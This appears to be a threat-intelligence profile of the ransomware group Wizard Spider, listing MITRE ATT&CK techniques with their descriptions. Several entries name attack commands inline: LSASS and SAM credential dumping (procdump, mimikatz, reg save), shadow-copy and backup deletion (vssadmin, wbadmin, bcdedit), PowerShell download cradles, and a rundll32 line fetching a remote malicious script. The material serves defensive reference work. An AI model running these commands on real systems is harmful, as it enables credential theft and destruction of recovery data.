Group Wizard Spider

Wizard Spider is a Russia-based financially motivated threat group originally known for the creation and deployment of TrickBot since at least 2016. Wizard Spider possesses a diverse aresenal of tools and has conducted ransomware campaigns against a variety of organizations, ranging from major corporations to hospitals.


 

List of techniques used :


id description
T1003.001 OS Credential Dumping: LSASS Memory
Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct Lateral Movement using Use Alternate Authentication Material. As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system. For example, on the target host use procdump: * procdump -ma lsass.exe lsass_dump Locally, mimikatz can be run using: * sekurlsa::Minidump lsassdump.dmp * sekurlsa::logonPasswords Built-in Windows tools such as `comsvcs.dll` can also be used: * rundll32.exe C:WindowsSystem32comsvcs.dll MiniDump PID lsass.dmp full Similar to Image File Execution Options Injection, the silent process exit mechanism can be abused to create a memory dump of `lsass.exe` through Windows Error Reporting (`WerFault.exe`). Windows Security Support Provider (SSP) DLLs are loaded into LSASS process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: HKLMSYSTEMCurrentControlSetControlLsaSecurity Packages and HKLMSYSTEMCurrentControlSetControlLsaOSConfigSecurity Packages. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called. The following SSPs can be used to access credentials: * Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package. * Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges. * Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later. * CredSSP: Provides SSO and Network Level Authentication for Remote Desktop Services.
T1003.002 OS Credential Dumping: Security Account Manager
Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through in-memory techniques or through the Windows Registry where the SAM database is stored. The SAM is a database file that contains local accounts for the host, typically those found with the net user command. Enumerating the SAM database requires SYSTEM level access. A number of tools can be used to retrieve the SAM file through in-memory techniques: * pwdumpx.exe * gsecdump * Mimikatz * secretsdump.py Alternatively, the SAM can be extracted from the Registry with Reg: * reg save HKLMsam sam * reg save HKLMsystem system Creddump7 can then be used to process the SAM database locally to retrieve hashes. Notes: * RID 500 account is the local, built-in administrator. * RID 501 is the guest account. * User accounts start with a RID of 1,000+.
T1003.003 OS Credential Dumping: NTDS
Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights. By default, the NTDS file (NTDS.dit) is located in %SystemRoot%NTDSNtds.dit of a domain controller. In addition to looking for NTDS files on active Domain Controllers, adversaries may search for backups that contain the same or similar information. The following tools and techniques can be used to enumerate the NTDS file and the contents of the entire Active Directory hashes. * Volume Shadow Copy * secretsdump.py * Using the in-built Windows tool, ntdsutil.exe * Invoke-NinjaCopy
T1005 Data from Local System
Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration. Adversaries may do this using a Command and Scripting Interpreter, such as cmd as well as a Network Device CLI, which have functionality to interact with the file system to gather information. Adversaries may also use Automated Collection on the local system.
T1016 System Network Configuration Discovery
Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp, ipconfig/ifconfig, nbtstat, and route. Adversaries may also leverage a Network Device CLI on network devices to gather information about configurations and settings, such as IP addresses of configured interfaces and static/dynamic routes (e.g. show ip route, show ip interface). Adversaries may use the information from System Network Configuration Discovery during automated discovery to shape follow-on behaviors, including determining certain access within the target network and what actions to do next.
T1018 Remote System Discovery
Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as Ping or net view using Net. Adversaries may also analyze data from local host files (ex: C:WindowsSystem32Driversetchosts or /etc/hosts) or other passive means (such as local Arp cache entries) in order to discover the presence of remote systems in an environment. Adversaries may also target discovery of network infrastructure as well as leverage Network Device CLI commands on network devices to gather detailed information about systems within a network (e.g. show cdp neighbors, show arp).
T1021 Remote Services
Adversaries may use Valid Accounts to log into a service that accepts remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user. In an enterprise environment, servers and workstations can be organized into domains. Domains provide centralized identity management, allowing users to login using one set of credentials across the entire network. If an adversary is able to obtain a set of valid domain credentials, they could login to many different machines using remote access protocols such as secure shell (SSH) or remote desktop protocol (RDP). They could also login to accessible SaaS or IaaS services, such as those that federate their identities to the domain. Legitimate applications (such as Software Deployment Tools and other administrative programs) may utilize Remote Services to access remote hosts. For example, Apple Remote Desktop (ARD) on macOS is native software used for remote management. ARD leverages a blend of protocols, including VNC to send the screen and control buffers and SSH for secure file transfer. Adversaries can abuse applications such as ARD to gain remote code execution and perform lateral movement. In versions of macOS prior to 10.14, an adversary can escalate an SSH session to an ARD session which enables an adversary to accept TCC (Transparency, Consent, and Control) prompts without user interaction and gain access to data.
T1021.001 Remote Services: Remote Desktop Protocol
Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user. Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS). Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials. Adversaries will likely use Credential Access techniques to acquire credentials to use with RDP. Adversaries may also use RDP in conjunction with the Accessibility Features or Terminal Services DLL for Persistence.
T1021.002 Remote Services: SMB/Windows Admin Shares
Adversaries may use Valid Accounts to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user. SMB is a file, printer, and serial port sharing protocol for Windows machines on the same network or domain. Adversaries may use SMB to interact with file shares, allowing them to move laterally throughout a network. Linux and macOS implementations of SMB typically use Samba. Windows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include `C$`, `ADMIN$`, and `IPC$`. Adversaries may use this technique in conjunction with administrator-level Valid Accounts to remotely access a networked system over SMB, to interact with systems using remote procedure calls (RPCs), transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are Scheduled Task/Job, Service Execution, and Windows Management Instrumentation. Adversaries can also use NTLM hashes to access administrator shares on systems with Pass the Hash and certain configuration and patch levels.
T1021.006 Remote Services: Windows Remote Management
Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user. WinRM is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services). It may be called with the `winrm` command or by any number of programs such as PowerShell. WinRM can be used as a method of remotely interacting with Windows Management Instrumentation.
T1027.010 Obfuscated Files or Information: Command Obfuscation
Adversaries may obfuscate content during command execution to impede detection. Command-line obfuscation is a method of making strings and patterns within commands and scripts more difficult to signature and analyze. This type of obfuscation can be included within commands executed by delivered payloads (e.g., Phishing and Drive-by Compromise) or interactively via Command and Scripting Interpreter. For example, adversaries may abuse syntax that utilizes various symbols and escape characters (such as spacing, `^`, `+`. `$`, and `%`) to make commands difficult to analyze while maintaining the same intended functionality. Many languages support built-in obfuscation in the form of base64 or URL encoding. Adversaries may also manually implement command obfuscation via string splitting (`“Wor”+“d.Application”`), order and casing of characters (`rev
T1033 System Owner/User Discovery
Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping. The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from System Owner/User Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. Various utilities and commands may acquire this information, including whoami. In macOS and Linux, the currently logged in user can be identified with w and who. On macOS the dscl . list /Users | grep -v '_' command can also be used to enumerate user accounts. Environment variables, such as %USERNAME% and $USER, may also be used to access this information. On network devices, Network Device CLI commands such as `show users` and `show ssh` can be used to display users currently logged into the device.
T1036.004 Masquerading: Masquerade Task or Service
Adversaries may attempt to manipulate the name of a task or service to make it appear legitimate or benign. Tasks/services executed by the Task Scheduler or systemd will typically be given a name and/or description. Windows services will have a service name as well as a display name. Many benign tasks and services exist that have commonly associated names. Adversaries may give tasks or services names that are similar or identical to those of legitimate ones. Tasks or services contain other fields, such as a description, that adversaries may attempt to make appear legitimate.
T1041 Exfiltration Over C2 Channel
Adversaries may steal data by exfiltrating it over an existing command and control channel. Stolen data is encoded into the normal communications channel using the same protocol as command and control communications.
T1047 Windows Management Instrumentation
Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is designed for programmers and is the infrastructure for management data and operations on Windows systems. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model and Windows Remote Management. Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS. An adversary can use WMI to interact with local and remote systems and use it as a means to execute various behaviors, such as gathering information for Discovery as well as Execution of commands and payloads. For example, `wmic.exe` can be abused by an adversary to delete shadow copies with the command `wmic.exe Shadowcopy Delete` (i.e., Inhibit System Recovery). **Note:** `wmic.exe` is deprecated as of January of 2024, with the WMIC feature being “disabled by default” on Windows 11+. WMIC will be removed from subsequent Windows releases and replaced by PowerShell as the primary WMI interface. In addition to PowerShell and tools like `wbemtool.exe`, COM APIs can also be used to programmatically interact with WMI via C++, .NET, VBScript, etc.
T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol
Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. Adversaries may opt to obfuscate this data, without the use of encryption, within network protocols that are natively unencrypted (such as HTTP, FTP, or DNS). This may include custom or publicly available encoding/compression algorithms (such as base64) as well as embedding data within protocol headers and fields.
T1053.005 Scheduled Task/Job: Scheduled Task
Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access the Task Scheduler in Windows. The schtasks utility can be run directly on the command line, or the Task Scheduler can be opened through the GUI within the Administrator Tools section of the Control Panel. In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, adversaries have used the Windows netapi32 library to create a scheduled task. The deprecated at utility could also be abused by adversaries (ex: At), though at.exe can not access tasks created with schtasks or the Control Panel. An adversary may use Windows Task Scheduler to execute programs at system startup or on a scheduled basis for persistence. The Windows Task Scheduler can also be abused to conduct remote Execution as part of Lateral Movement and/or to run a process under the context of a specified account (such as SYSTEM). Similar to System Binary Proxy Execution, adversaries have also abused the Windows Task Scheduler to potentially mask one-time execution under signed/trusted system processes. Adversaries may also create "hidden" scheduled tasks (i.e. Hide Artifacts) that may not be visible to defender tools and manual queries used to enumerate tasks. Specifically, an adversary may hide a task from `schtasks /query` and the Task Scheduler by deleting the associated Security Descriptor (SD) registry value (where deletion of this value must be completed using SYSTEM permissions). Adversaries may also employ alternate methods to hide tasks, such as altering the metadata (e.g., `Index` value) within associated registry keys.
T1055 Process Injection
Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process. There are many different ways to inject code into a process, many of which abuse legitimate functionalities. These implementations exist for every major OS but are typically platform specific. More sophisticated samples may perform multiple process injections to segment modules and further evade detection, utilizing named pipes or other inter-process communication (IPC) mechanisms as a communication channel.
T1055.001 Process Injection: Dynamic-link Library Injection
Adversaries may inject dynamic-link libraries (DLLs) into processes in order to evade process-based defenses as well as possibly elevate privileges. DLL injection is a method of executing arbitrary code in the address space of a separate live process. DLL injection is commonly performed by writing the path to a DLL in the virtual address space of the target process before loading the DLL by invoking a new thread. The write can be performed with native Windows API calls such as VirtualAllocEx and WriteProcessMemory, then invoked with CreateRemoteThread (which calls the LoadLibrary API responsible for loading the DLL). Variations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue as well as the additional APIs to invoke execution (since these methods load and execute the files in memory by manually preforming the function of LoadLibrary). Another variation of this method, often referred to as Module Stomping/Overloading or DLL Hollowing, may be leveraged to conceal injected code within a process. This method involves loading a legitimate DLL into a remote process then manually overwriting the module's AddressOfEntryPoint before starting a new thread in the target process. This variation allows attackers to hide malicious injected code by potentially backing its execution with a legitimate DLL file on disk. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via DLL injection may also evade detection from security products since the execution is masked under a legitimate process.
T1059.001 Command and Scripting Interpreter: PowerShell
Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems). PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk. A number of PowerShell-based offensive testing tools are available, including Empire, PowerSploit, PoshC2, and PSAttack. PowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary through interfaces to PowerShell's underlying System.Management.Automation assembly DLL exposed through the .NET framework and Windows Common Language Interface (CLI).
T1059.003 Command and Scripting Interpreter: Windows Command Shell
Adversaries may abuse the Windows command shell for execution. The Windows command shell (cmd) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. The command prompt can be invoked remotely via Remote Services such as SSH. Batch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops. Common uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple systems. Adversaries may leverage cmd to execute various commands and payloads. Common uses include cmd to execute a single command, or abusing cmd interactively with input and output forwarded over a command and control channel.
T1070.004 Indicator Removal: File Deletion
Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint. There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well. Examples of built-in Command and Scripting Interpreter functions include del on Windows and rm or unlink on Linux and macOS.
T1071.001 Application Layer Protocol: Web Protocols
Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. Protocols such as HTTP/S and WebSocket that carry web traffic may be very common in environments. HTTP/S packets have many fields and headers in which data can be concealed. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.
T1074 Data Staged
Adversaries may stage collected data in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as Archive Collected Data. Interactive command shells may be used, and common functionality within cmd and bash may be used to copy data into a staging location. In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may Create Cloud Instance and stage data in that instance. Adversaries may choose to stage data from a victim network in a centralized location prior to Exfiltration to minimize the number of connections made to their C2 server and better evade detection.
T1074.001 Data Staged: Local Data Staging
Adversaries may stage collected data in a central location or directory on the local system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as Archive Collected Data. Interactive command shells may be used, and common functionality within cmd and bash may be used to copy data into a staging location. Adversaries may also stage collected data in various available formats/locations of a system, including local storage databases/repositories or the Windows Registry.
T1078 Valid Accounts
Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence. In some cases, adversaries may abuse inactive accounts: for example, those belonging to individuals who are no longer part of an organization. Using these accounts may allow the adversary to evade detection, as the original account user will not be present to identify any anomalous activity taking place on their account. The overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise.
T1078.002 Valid Accounts: Domain Accounts
Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services. Adversaries may compromise domain accounts, some with a high level of privileges, through various means such as OS Credential Dumping or password reuse, allowing access to privileged resources of the domain.
T1082 System Information Discovery
An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. Tools such as Systeminfo can be used to gather detailed system information. If running with privileged access, a breakdown of system data can be gathered through the systemsetup configuration tool on macOS. As an example, adversaries with user-level access can execute the df -aH command to obtain currently mounted disks and associated freely available space. Adversaries may also leverage a Network Device CLI on network devices to gather detailed system information (e.g. show version). System Information Discovery combined with information gathered from other forms of discovery and reconnaissance can drive payload development and concealment. Infrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure allow access to instance and virtual machine information via APIs. Successful authenticated API calls can return data such as the operating system platform and status of a particular instance or the model view of a virtual machine.
T1087.002 Account Discovery: Domain Account
Adversaries may attempt to get a listing of domain accounts. This information can help adversaries determine which domain accounts exist to aid in follow-on behavior such as targeting specific accounts which possess particular privileges. Commands such as net user /domain and net group /domain of the Net utility, dscacheutil -q groupon macOS, and ldapsearch on Linux can list domain users and groups. PowerShell cmdlets including Get-ADUser and Get-ADGroupMember may enumerate members of Active Directory groups.
T1105 Ingress Tool Transfer
Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp. Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer). On Windows, adversaries may use various utilities to download tools, such as `copy`, `finger`, certutil, and PowerShell commands such as IEX(New-Object Net.WebClient).downloadString() and Invoke-WebRequest. On Linux and macOS systems, a variety of utilities also exist, such as `curl`, `scp`, `sftp`, `tftp`, `rsync`, `finger`, and `wget`. Adversaries may also abuse installers and package managers, such as `yum` or `winget`, to download tools to victim hosts. Adversaries have also abused file application features, such as the Windows `search-ms` protocol handler, to deliver malicious files to victims through remote file searches invoked by User Execution (typically after interacting with Phishing lures). Files can also be transferred using various Web Services as well as native or otherwise present tools on the victim system. In some cases, adversaries may be able to leverage services that sync between a web-based and an on-premises client, such as Dropbox or OneDrive, to transfer files onto victim systems. For example, by compromising a cloud account and logging into the service's web portal, an adversary may be able to trigger an automatic syncing process that transfers the file onto the victim's machine.
T1112 Modify Registry
Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution. Access to specific areas of the Registry depends on account permissions, some requiring administrator-level access. The built-in Windows command-line utility Reg may be used for local or remote Registry modification. Other tools may also be used, such as a remote access tool, which may contain functionality to interact with the Registry through the Windows API. Registry modifications may also include actions to hide keys, such as prepending key names with a null character, which will cause an error and/or be ignored when read via Reg or other utilities using the Win32 API. Adversaries may abuse these pseudo-hidden keys to conceal payloads/commands used to maintain persistence. The Registry of a remote system may be modified to aid in execution of files as part of lateral movement. It requires the remote Registry service to be running on the target system. Often Valid Accounts are required, along with access to the remote system's SMB/Windows Admin Shares for RPC communication.
T1133 External Remote Services
Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as Windows Remote Management and VNC can also be used externally. Access to Valid Accounts to use the service is often a requirement, which could be obtained through credential pharming or by obtaining the credentials from users after compromising the enterprise network. Access to remote services may be used as a redundant or persistent access mechanism during an operation. Access may also be gained through an exposed service that doesn’t require authentication. In containerized environments, this may include an exposed Docker API, Kubernetes API server, kubelet, or web application such as the Kubernetes dashboard.
T1135 Network Share Discovery
Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network. File sharing over a Windows network occurs over the SMB protocol. Net can be used to query a remote system for available shared drives using the net view \remotesystem command. It can also be used to query shared drives on the local system using net share. For macOS, the sharing -l command lists all shared points used for smb services.
T1136.001 Create Account: Local Account
Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. For example, with a sufficient level of access, the Windows net user /add command can be used to create a local account. On macOS systems the dscl -create command can be used to create a local account. Local accounts may also be added to network devices, often via common Network Device CLI commands such as username, or to Kubernetes clusters using the `kubectl` utility. Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
T1136.002 Create Account: Domain Account
Adversaries may create a domain account to maintain access to victim systems. Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover user, administrator, and service accounts. With a sufficient level of access, the net user /add /domain command can be used to create a domain account. Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
T1197 BITS Jobs
Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through Component Object Model (COM). BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations. The interface to create and manage BITS jobs is accessible through PowerShell and the BITSAdmin tool. Adversaries may abuse BITS to download (e.g. Ingress Tool Transfer), execute, and even clean up after running malicious code (e.g. Indicator Removal). BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls. BITS enabled execution may also enable persistence by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots). BITS upload functionalities can also be used to perform Exfiltration Over Alternative Protocol.
T1204.001 User Execution: Malicious Link
An adversary may rely upon a user clicking a malicious link in order to gain execution. Users may be subjected to social engineering to get them to click on a link that will lead to code execution. This user action will typically be observed as follow-on behavior from Spearphishing Link. Clicking on a link may also lead to other execution techniques such as exploitation of a browser or application vulnerability via Exploitation for Client Execution. Links may also lead users to download files that require execution via Malicious File.
T1204.002 User Execution: Malicious File
An adversary may rely upon a user opening a malicious file in order to gain execution. Users may be subjected to social engineering to get them to open a file that will lead to code execution. This user action will typically be observed as follow-on behavior from Spearphishing Attachment. Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl. Adversaries may employ various forms of Masquerading and Obfuscated Files or Information to increase the likelihood that a user will open and successfully execute a malicious file. These methods may include using a familiar naming convention and/or password protecting the file and supplying instructions to a user on how to open it. While Malicious File frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after Internal Spearphishing.
T1210 Exploitation of Remote Services
Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system. An adversary may need to determine if the remote system is in a vulnerable state, which may be done through Network Service Discovery or other Discovery methods looking for common, vulnerable software that may be deployed in the network, the lack of certain patches that may indicate vulnerabilities, or security software that may be used to detect or contain remote exploitation. Servers are likely a high value target for lateral movement exploitation, but endpoint systems may also be at risk if they provide an advantage or access to additional resources. There are several well-known vulnerabilities that exist in common services such as SMB and RDP as well as applications that may be used within internal networks such as MySQL and web server services. Depending on the permissions level of the vulnerable remote service an adversary may achieve Exploitation for Privilege Escalation as a result of lateral movement exploitation as well.
T1218.011 System Binary Proxy Execution: Rundll32
Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: rundll32.exe {DLLname, DLLfunction}). Rundll32.exe can also be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute. Rundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:"..mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")" This behavior has been seen used by malware such as Poweliks. Adversaries may also attempt to obscure malicious code from analysis by abusing the manner in which rundll32.exe loads DLL function names. As part of Windows compatibility support for various character sets, rundll32.exe will first check for wide/Unicode then ANSI character-supported functions before loading the specified function (e.g., given the command rundll32.exe ExampleDLL.dll, ExampleFunction, rundll32.exe would first attempt to execute ExampleFunctionW, or failing that ExampleFunctionA, before loading ExampleFunction). Adversaries may therefore obscure malicious code by creating multiple identical exported function names and appending W and/or A to harmless ones. DLL functions can also be exported and executed by an ordinal number (ex: rundll32.exe file.dll,#1). Additionally, adversaries may use Masquerading techniques (such as changing DLL file names, file extensions, or function names) to further conceal execution of a malicious payload.
T1222.001 File and Directory Permissions Modification: Windows File and Directory Permissions Modification
Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files. File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.). Windows implements file and directory ACLs as Discretionary Access Control Lists (DACLs). Similar to a standard ACL, DACLs identifies the accounts that are allowed or denied access to a securable object. When an attempt is made to access a securable object, the system checks the access control entries in the DACL in order. If a matching entry is found, access to the object is granted. Otherwise, access is denied. Adversaries can interact with the DACLs using built-in Windows commands, such as `icacls`, `cacls`, `takeown`, and `attrib`, which can grant adversaries higher permissions on specific files and folders. Further, PowerShell provides cmdlets that can be used to retrieve or modify file and directory DACLs. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via Accessibility Features, Boot or Logon Initialization Scripts, or tainting/hijacking other instrumental binary/configuration files via Hijack Execution Flow.
T1489 Service Stop
Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services or processes can inhibit or stop response to an incident or aid in the adversary's overall objectives to cause damage to the environment. Adversaries may accomplish this by disabling individual services of high importance to an organization, such as MSExchangeIS, which will make Exchange content inaccessible . In some cases, adversaries may stop or disable many or all services to render systems unusable. Services or processes may not allow for modification of their data stores while running. Adversaries may stop services or processes in order to conduct Data Destruction or Data Encrypted for Impact on the data stores of services like Exchange and SQL Server.
T1490 Inhibit System Recovery
Adversaries may delete or remove built-in data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery. This may deny access to available backups and recovery options. Operating systems may contain features that can help fix corrupted systems, such as a backup catalog, volume shadow copies, and automatic repair features. Adversaries may disable or delete system recovery features to augment the effects of Data Destruction and Data Encrypted for Impact. Furthermore, adversaries may disable recovery notifications, then corrupt backups. A number of native Windows utilities have been used by adversaries to disable or delete system recovery features: * vssadmin.exe can be used to delete all volume shadow copies on a system - vssadmin.exe delete shadows /all /quiet * Windows Management Instrumentation can be used to delete volume shadow copies - wmic shadowcopy delete * wbadmin.exe can be used to delete the Windows Backup Catalog - wbadmin.exe delete catalog -quiet * bcdedit.exe can be used to disable automatic Windows recovery features by modifying boot configuration data - bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no * REAgentC.exe can be used to disable Windows Recovery Environment (WinRE) repair/recovery options of an infected system * diskshadow.exe can be used to delete all volume shadow copies on a system - diskshadow delete shadows all On network devices, adversaries may leverage Disk Wipe to delete backup firmware images and reformat the file system, then System Shutdown/Reboot to reload the device. Together this activity may leave network devices completely inoperable and inhibit recovery operations. Adversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services. In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.
T1518 Software Discovery
Adversaries may attempt to get a listing of software and software versions that are installed on a system or in a cloud environment. Adversaries may use the information from Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. Such software may be deployed widely across the environment for configuration management or security reasons, such as Software Deployment Tools, and may allow adversaries broad access to infect devices or move laterally. Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable to Exploitation for Privilege Escalation.
T1518.001 Software Discovery: Security Software Discovery
